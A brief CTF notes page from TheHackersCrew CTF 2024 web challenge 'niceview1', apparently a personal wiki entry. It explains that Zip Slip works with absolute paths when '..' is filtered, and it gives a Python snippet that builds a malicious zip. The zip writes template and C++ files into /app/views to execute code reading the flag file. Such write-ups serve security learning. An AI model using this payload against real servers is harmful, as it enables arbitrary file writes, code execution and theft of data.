unsolved
Zip Slip + Absolute Paths
Lessons learned from TheHackersCrew CTF 2024: [WEB] niceview1
- Zip Slip is possible with absolute paths (challenge filtered double dots).
payload = f""" <%inc #include "{rs}_util.json" %> {{% goflag() %}} """ payload2 = """ #include <fstream> std::string goflag() { std::ifstream fin("/app/flag.txt"); std::string line; std::getline(fin, line); return line; } """ zf = io.BytesIO() with zipfile.ZipFile(zf, 'w') as myzip: myzip.writestr(f'/app/views/d/{name}.csp', payload) myzip.writestr(f'/app/views/d/{name}.csp.csp', payload) myzip.writestr(f'/app/views/d/{name}_util.json', payload2)
unsolved.txt · Last modified: 2024/08/21 13:32 by osorin